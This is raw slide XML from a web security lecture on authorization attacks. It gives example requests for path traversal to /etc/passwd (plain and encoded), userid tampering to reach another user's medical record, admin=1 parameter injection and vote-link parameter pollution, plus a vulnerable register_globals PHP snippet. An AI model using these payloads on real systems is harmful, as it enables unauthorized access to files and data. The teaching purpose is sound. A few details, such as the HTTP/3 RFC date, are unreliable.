            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not use repeatable, predictable, long-lived session IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not allow the user to choose the session IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible, use well-established third-party authentication services…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… and follow industry standards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30925162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15FD-FEE6-1507-9459-779459250E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181A9E1C-B625-7B04-E944-FB461C22AB87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implicit listing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameter manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246136022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Forceful Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resources in a web application are identified by paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web application developer assumes that the application will be accessed through links, following the “intended flow”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user, however, is not bound to follow the prescribed links and can “jump” to any publicly available resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If paths are predictable, one can bypass authorization checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User is presented with list of documents only after authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requesting directly the URL http://www.acme.com/resources/ provides access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236549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207963" y="103585"/>
            <a:ext cx="8494712" cy="984647"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="83598" tIns="41799" rIns="83598" bIns="41799"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr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err="1"/>
              <a:t>HyperText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Transfer Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="816131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282575" y="1360885"/>
            <a:ext cx="8231188" cy="3305175"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="83598" tIns="41799" rIns="83598" bIns="41799"/>
          <a:lstStyle/>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Protocol used to transfer information between a web client and a web server</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Based on TCP, uses port 80</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Version 1.0 is defined in RFC 1945 (now obsolete)</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Version 1.1 is defined in RFC 2616 (1997)</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Version 2 is defined in RFC 7540 (2015)</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Version 3 is defined in RFC 9114 (2020)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4276399912"/>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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672773" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications might build filename paths using user-provided input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path/directory traversal attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Break out of the document space by using relative paths </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>show.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=/../../../../../../etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paths can be encoded, double-encoded, obfuscated, etc:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>show.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216391769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Directory Listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If automated directory listing is enabled, the browser may return a listing of the directory if no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file is present and may expose contents that should not be accessible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308532240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tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameter manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The resources accessible are determined by the parameters to a query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If client-side information is blindly accepted, one can simply modify the parameter(s) of a legitimate request to access additional information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cgi-bin/profile?userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1229&amp;type=medical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cgi-bin/profile?userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1230</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;type=medical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameter creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If parameters from the request query are blindly imported into the application’s space, one might modify the behavior of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cgi-bin/profile?userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1229&amp;type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>medical&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322592592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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>register_global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (deprecated!)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>register_global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directive makes request information, such as the GET/POST variables and cookie information, available as global variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables can be provided so that particular, unexpected execution paths are followed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables could be set regardless of conditional statements</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   if ($_GET[“password”]==“secret”) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      $admin = true;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   if ($admin) { ... }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable to: GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vuln.php?password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo&amp;admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All variables should be initialized/sanitized along every path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214514810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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PHP’s register_global</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1078275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Register_global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was “on” by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security/usability trade-off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This has been changed in releases after 4.2.0, but:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many existing PHP-based applications require the directive to be on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some PHP-based application solved the problem by adding code that simulates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>register_global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23518064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Attacks: Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameter Pollution: In case of multiple occurrences of the same variable in the query string of a request, servers might behave differently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/?color=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>red&amp;color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=blue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>color=red</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>color=blue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>color=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>red,blue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the link on a web page are created on the basis of user input, it is possible to pollute parameters by injecting query delimiters (the ampersand)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374879189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Pollution Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original URL: http://host/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>election.jsp?poll_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4568</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link1: &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vote.jsp?poll_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4568&amp;candidate=white”&gt;Vote for Mr. White&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link2: &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vote.jsp?poll_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4568&amp;candidate=green”&gt;Vote for Mrs. Green&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker-provided URL: http://host/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>election.jsp?poll_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4568%26candidate%3Dgreen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link 1: &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vote.jsp?poll_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4568&amp;candidate=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>green&amp;candidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=white”&gt;Vote for Mr. White&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link 2: &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vote.jsp?poll_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4568&amp;candidate=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>green&amp;candidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=green”&gt;Vote for Mrs. Green&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the server accepts only the first parameter value, the result will be always the selection of Mr. Green</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
